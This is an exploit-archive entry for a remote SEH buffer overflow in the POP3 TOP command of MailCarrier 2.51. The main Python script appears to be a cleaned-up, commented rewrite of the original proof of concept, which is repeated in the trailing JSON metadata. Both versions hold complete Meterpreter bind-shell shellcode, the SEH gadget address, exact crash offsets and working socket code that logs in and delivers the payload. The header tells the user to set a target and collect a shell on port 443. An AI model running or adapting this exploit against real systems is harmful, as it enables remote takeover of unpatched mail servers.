ID 1337DAY-ID-32544
Type zdt
Reporter Dino Covotsos
Modified 2019-04-15T00:00:00
Description
Remote exploit for the Windows platform: an SEH-overwrite buffer overflow in the POP3 "TOP" command of MailCarrier 2.51 (tested on Windows XP SP3 x86); the PoC authenticates over POP3 and delivers a Meterpreter bind shell listening on TCP/443 on the target.
#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "TOP" command(POP3)
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - SEH Exploit
# POC
# 1.) Change ip, username, password and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
#crash at 6175
import sys
import socket
import time
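# Shellcode generated with:
#   msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
# meterpreter/bind_tcp makes the *target* listen on TCP/443 and hands the session to
# whoever connects first, so on a shared network prefer a reverse payload.  If you
# regenerate, just paste the new bytes: the trailing pad below is derived from
# len(shellcode) rather than hard-coded.  Bytes literals so the payload goes out as raw
# bytes under both Python 2 and Python 3.
shellcode = (b"\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
             b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
             b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
             b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
             b"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
             b"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
             b"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
             b"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
             b"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
             b"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
             b"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
             b"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
             b"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
             b"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
             b"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
             b"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
             b"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
             b"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
             b"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
             b"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
             b"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
             b"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
             b"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
             b"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
             b"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
             b"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
             b"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
             b"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
             b"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
             b"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
             b"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
             b"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
             b"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
             b"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
             b"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
             b"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
             b"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
             b"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
             b"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
             b"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
             b"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
             b"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
             b"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
             b"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
             b"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
             b"\x6f\x78\x55\x41\x41")

# --- payload layout (offsets from the author's crash analysis in the header) --------
# The SEH record is overwritten after this many bytes of the TOP argument.
CRASH_OFFSET = 6175
# nSEH: "jmp short +0x11" followed by two NOPs.  Measured from the start of nSEH the
# jump lands at 2 + 0x11 = 19, i.e. inside the 20-byte NOP sled that follows the 4-byte
# handler address (nSEH 0-3, handler 4-7, sled 8-27), then slides into the shellcode.
NSEH = b"\xeb\x11\x90\x90"
# SEH handler (little-endian 0x1b0d110c): pop ecx # pop ecx # ret 0x08 in msjet40.dll
# v4.00.9514.0 -- no SafeSEH, not rebased, no ASLR on XP SP3.  This is module- and
# version-specific; re-find a gadget for any other build.
# NOTE(review): 0x0d is in the bad-character list passed to msfvenom above, yet it is
# sent here as part of the handler address.  The author reports a working exploit, so
# the list is presumably over-conservative for this position; if the payload does not
# fire, this byte is the first thing to check.
SEH = b"\x0c\x11\x0d\x1b"
NOP_SLED = b"\x90" * 20
# Total length of the TOP argument the original PoC sends (6883 used bytes + "D" pad).
TOTAL_LEN = 10000

# --- target defaults (identical to the values hard-coded in the original) -----------
DEFAULT_HOST = "192.168.0.150"
DEFAULT_PORT = 110
DEFAULT_USER = "test"
DEFAULT_PASS = "test"
# Seconds to wait on connect/recv/send.  Without a timeout the script hangs forever
# when the service dies mid-session (which is exactly what a failed overflow does).
SOCKET_TIMEOUT = 10.0


def build_payload():
    """Return the TOP argument: junk | nSEH | SEH handler | NOP sled | shellcode | pad.

    The trailing "D" pad is sized from the actual prefix length so the total is always
    TOTAL_LEN (the original hard-coded 10000 - 6883, which silently breaks if the
    shellcode is regenerated with a different length).

    Raises:
        ValueError: if the fixed prefix plus shellcode already exceeds TOTAL_LEN.
    """
    head = b"A" * CRASH_OFFSET + NSEH + SEH + NOP_SLED + shellcode
    if len(head) > TOTAL_LEN:
        raise ValueError("payload is %d bytes, exceeds TOTAL_LEN=%d; shorten the shellcode"
                         % (len(head), TOTAL_LEN))
    return head + b"D" * (TOTAL_LEN - len(head))


def parse_args(argv):
    """Return (host, port, user, password) from positional arguments.

    Usage: python <this script> [host] [port] [user] [password]
    Missing arguments fall back to the DEFAULT_* constants, so running with no
    arguments reproduces the original hard-coded target and credentials.

    Raises:
        ValueError: if the port argument is not an integer.
    """
    host = argv[0] if len(argv) > 0 else DEFAULT_HOST
    port = int(argv[1]) if len(argv) > 1 else DEFAULT_PORT
    user = argv[2] if len(argv) > 2 else DEFAULT_USER
    password = argv[3] if len(argv) > 3 else DEFAULT_PASS
    return host, port, user, password


def _send_line(sock, line):
    """Send one CRLF-terminated POP3 command line completely.

    socket.send() may write only part of a buffer -- relevant for the ~10 kB TOP
    argument -- so sendall() is used to guarantee the whole line goes out.
    """
    sock.sendall(line + b"\r\n")


def exploit(host, port, user, password):
    """Authenticate to the POP3 service and send the malicious TOP argument.

    The script logs in with USER/PASS before issuing TOP, so valid mailbox credentials
    appear to be required; whether TOP is reachable unauthenticated is not established
    here.  On success the Meterpreter bind shell listens on TCP/443 on the target.
    """
    payload = build_payload()
    print("[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\r\n")
    print("[*] Sending pwnage buffer: with %s bytes..." % len(payload))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(SOCKET_TIMEOUT)
    try:
        s.connect((host, port))
        print(s.recv(1024))
        print("[*] Sending USERNAME\r\n")
        _send_line(s, b"USER " + user.encode("ascii"))
        print(s.recv(1024))
        print("[*] Sending PASSWORD\r\n")
        _send_line(s, b"PASS " + password.encode("ascii"))
        print(s.recv(1024))
        print("[*] Sending TOP command plus evil buffer\r\n")
        _send_line(s, b"TOP " + payload)
        try:
            _send_line(s, b"QUIT")
        except socket.error:
            # The service may already have stopped answering once the overflow hit;
            # a reset here is expected, not a failure of the PoC.
            pass
    finally:
        s.close()
    time.sleep(1)
    print("[*] Done, check for meterpreter shell on port 443 of the target!")


def main(argv=None):
    """Entry point; arguments default to sys.argv[1:] (see parse_args for the format)."""
    host, port, user, password = parse_args(sys.argv[1:] if argv is None else argv)
    exploit(host, port, user, password)


if __name__ == "__main__":
    main()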
# 0day.today [2019-04-17] #
{"id": "1337DAY-ID-32544", "bulletinFamily": "exploit", "title": "MailCarrier 2.51 - POP3 (TOP) SEH Buffer Overflow Exploit", "description": "Exploit for windows platform in category remote exploits", "published": "2019-04-15T00:00:00", "modified": "2019-04-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/32544", "reporter": "Dino Covotsos", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2019-04-17T19:38:47", "edition": 1, "viewCount": 29, "enchantments": {"dependencies": {"references": [], "modified": "2019-04-17T19:38:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2019-04-17T19:38:47", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/32544", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in \"TOP\" command(POP3)\r\n# Exploit Author: Dino Covotsos - Telspace Systems\r\n# Vendor Homepage: https://www.tabslab.com/\r\n# Version: 2.51\r\n# Software Link: N.A\r\n# Contact: services[@]telspace.co.za\r\n# Twitter: @telspacesystems (Greets to the Telspace Crew)\r\n# Tested on: Windows XP Prof SP3 ENG x86\r\n# CVE: TBC from Mitre\r\n# Created for the Telspace Internship 2019 - SEH Exploit\r\n# POC\r\n# 1.) Change ip, username, password and port in code\r\n# 2.) 
Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine\r\n#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\\WINDOWS\\system32\\msjet40.dll)\r\n#crash at 6175\r\nimport sys\r\nimport socket\r\nimport time\r\n\r\n#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b \"\\x00\\xd5\\x0a\\x0d\\x1a\\x03\" -f c\r\nshellcode = (\"\\x89\\xe1\\xdb\\xcb\\xd9\\x71\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\"\r\n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\"\r\n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"\r\n\"\\x69\\x6c\\x78\\x68\\x6f\\x72\\x47\\x70\\x37\\x70\\x53\\x30\\x31\\x70\\x4f\"\r\n\"\\x79\\x58\\x65\\x66\\x51\\x49\\x50\\x50\\x64\\x4c\\x4b\\x50\\x50\\x56\\x50\"\r\n\"\\x4e\\x6b\\x56\\x32\\x74\\x4c\\x6e\\x6b\\x50\\x52\\x36\\x74\\x6c\\x4b\\x63\"\r\n\"\\x42\\x36\\x48\\x66\\x6f\\x58\\x37\\x52\\x6a\\x35\\x76\\x76\\x51\\x69\\x6f\"\r\n\"\\x6c\\x6c\\x35\\x6c\\x51\\x71\\x33\\x4c\\x75\\x52\\x64\\x6c\\x47\\x50\\x69\"\r\n\"\\x51\\x4a\\x6f\\x34\\x4d\\x37\\x71\\x38\\x47\\x58\\x62\\x6c\\x32\\x62\\x72\"\r\n\"\\x70\\x57\\x6c\\x4b\\x52\\x72\\x42\\x30\\x4e\\x6b\\x53\\x7a\\x65\\x6c\\x6e\"\r\n\"\\x6b\\x30\\x4c\\x42\\x31\\x33\\x48\\x78\\x63\\x31\\x58\\x55\\x51\\x4b\\x61\"\r\n\"\\x66\\x31\\x6c\\x4b\\x50\\x59\\x37\\x50\\x67\\x71\\x38\\x53\\x6e\\x6b\\x33\"\r\n\"\\x79\\x65\\x48\\x6a\\x43\\x75\\x6a\\x62\\x69\\x6c\\x4b\\x56\\x54\\x6e\\x6b\"\r\n\"\\x37\\x71\\x38\\x56\\x55\\x61\\x39\\x6f\\x4c\\x6c\\x4a\\x61\\x78\\x4f\\x46\"\r\n\"\\x6d\\x37\\x71\\x49\\x57\\x66\\x58\\x69\\x70\\x31\\x65\\x6b\\x46\\x55\\x53\"\r\n\"\\x51\\x6d\\x69\\x68\\x65\\x6b\\x61\\x6d\\x51\\x34\\x74\\x35\\x6a\\x44\\x70\"\r\n\"\\x58\\x6c\\x4b\\x30\\x58\\x55\\x74\\x65\\x51\\x6b\\x63\\x61\\x76\\x
6e\\x6b\"\r\n\"\\x76\\x6c\\x30\\x4b\\x6e\\x6b\\x71\\x48\\x47\\x6c\\x33\\x31\\x7a\\x73\\x4c\"\r\n\"\\x4b\\x55\\x54\\x6c\\x4b\\x77\\x71\\x6e\\x30\\x4b\\x39\\x32\\x64\\x34\\x64\"\r\n\"\\x36\\x44\\x61\\x4b\\x51\\x4b\\x45\\x31\\x30\\x59\\x52\\x7a\\x42\\x71\\x59\"\r\n\"\\x6f\\x69\\x70\\x53\\x6f\\x33\\x6f\\x72\\x7a\\x4c\\x4b\\x34\\x52\\x78\\x6b\"\r\n\"\\x6c\\x4d\\x63\\x6d\\x71\\x78\\x50\\x33\\x77\\x42\\x55\\x50\\x53\\x30\\x33\"\r\n\"\\x58\\x70\\x77\\x70\\x73\\x30\\x32\\x31\\x4f\\x61\\x44\\x42\\x48\\x30\\x4c\"\r\n\"\\x54\\x37\\x76\\x46\\x34\\x47\\x59\\x6f\\x78\\x55\\x78\\x38\\x4c\\x50\\x33\"\r\n\"\\x31\\x65\\x50\\x35\\x50\\x35\\x79\\x48\\x44\\x50\\x54\\x30\\x50\\x75\\x38\"\r\n\"\\x56\\x49\\x6f\\x70\\x62\\x4b\\x75\\x50\\x69\\x6f\\x68\\x55\\x73\\x5a\\x74\"\r\n\"\\x4b\\x42\\x79\\x62\\x70\\x79\\x72\\x59\\x6d\\x53\\x5a\\x63\\x31\\x52\\x4a\"\r\n\"\\x67\\x72\\x65\\x38\\x6b\\x5a\\x74\\x4f\\x79\\x4f\\x69\\x70\\x69\\x6f\\x48\"\r\n\"\\x55\\x5a\\x37\\x31\\x78\\x44\\x42\\x73\\x30\\x33\\x31\\x4d\\x6b\\x6e\\x69\"\r\n\"\\x38\\x66\\x70\\x6a\\x76\\x70\\x70\\x56\\x72\\x77\\x53\\x58\\x6f\\x32\\x59\"\r\n\"\\x4b\\x46\\x57\\x73\\x57\\x39\\x6f\\x38\\x55\\x6d\\x55\\x39\\x50\\x43\\x45\"\r\n\"\\x61\\x48\\x53\\x67\\x65\\x38\\x4e\\x57\\x59\\x79\\x66\\x58\\x4b\\x4f\\x6b\"\r\n\"\\x4f\\x59\\x45\\x43\\x67\\x75\\x38\\x51\\x64\\x58\\x6c\\x77\\x4b\\x39\\x71\"\r\n\"\\x69\\x6f\\x49\\x45\\x32\\x77\\x4d\\x47\\x42\\x48\\x43\\x45\\x32\\x4e\\x52\"\r\n\"\\x6d\\x50\\x61\\x4b\\x4f\\x39\\x45\\x52\\x4a\\x67\\x70\\x53\\x5a\\x74\\x44\"\r\n\"\\x73\\x66\\x42\\x77\\x53\\x58\\x43\\x32\\x7a\\x79\\x39\\x58\\x63\\x6f\\x79\"\r\n\"\\x6f\\x6e\\x35\\x4d\\x53\\x4c\\x38\\x65\\x50\\x73\\x4e\\x46\\x4d\\x4e\\x6b\"\r\n\"\\x66\\x56\\x30\\x6a\\x57\\x30\\x65\\x38\\x33\\x30\\x62\\x30\\x77\\x70\\x75\"\r\n\"\\x50\\x63\\x66\\x70\\x6a\\x65\\x50\\x52\\x48\\x61\\x48\\x39\\x34\\x61\\x43\"\r\n\"\\x69\\x75\\x69\\x6f\\x38\\x55\\x7a\\x33\\x50\\x53\\x31\\x7a\\x45\\x50\\x66\"\r\n\"\\x36\\x51\\x43\\x76\\x37\\x31\\x78\\x43\\x32\\x69\\x49\\x6f\\x38\\x51\\x4f\
"\r\n\"\\x4b\\x4f\\x39\\x45\\x4d\\x53\\x69\\x68\\x43\\x30\\x63\\x4e\\x73\\x37\\x67\"\r\n\"\\x71\\x4a\\x63\\x44\\x69\\x5a\\x66\\x73\\x45\\x38\\x69\\x6a\\x63\\x6f\\x4b\"\r\n\"\\x4a\\x50\\x4c\\x75\\x4e\\x42\\x42\\x76\\x33\\x5a\\x37\\x70\\x63\\x63\\x69\"\r\n\"\\x6f\\x78\\x55\\x41\\x41\")\r\n\r\nbuffer = \"A\" * 6175 + \"\\xeb\\x11\\x90\\x90\" + \"\\x0c\\x11\\x0d\\x1b\" + \"\\x90\" * 20 + shellcode + \"D\" * (10000-6883)\r\n\r\nprint \"[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\\r\\n\"\r\nprint \"[*] Sending pwnage buffer: with %s bytes...\" %len(buffer)\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnect=s.connect((\"192.168.0.150\", 110))\r\nprint s.recv(1024)\r\nprint \"[*] Sending USERNAME\\r\\n\"\r\ns.send('USER test' + '\\r\\n')\r\nprint s.recv(1024)\r\nprint \"[*] Sending PASSWORD\\r\\n\"\r\ns.send('PASS test' + '\\r\\n')\r\nprint s.recv(1024)\r\nprint \"[*] Sending TOP command plus evil buffer\\r\\n\"\r\ns.send('TOP ' + buffer + '\\r\\n')\r\ns.send('QUIT\\r\\n')\r\ns.close()\r\ntime.sleep(1)\r\nprint \"[*] Done, check for meterpreter shell on port 443 of the target!\"\n\n# 0day.today [2019-04-17] #"}
{}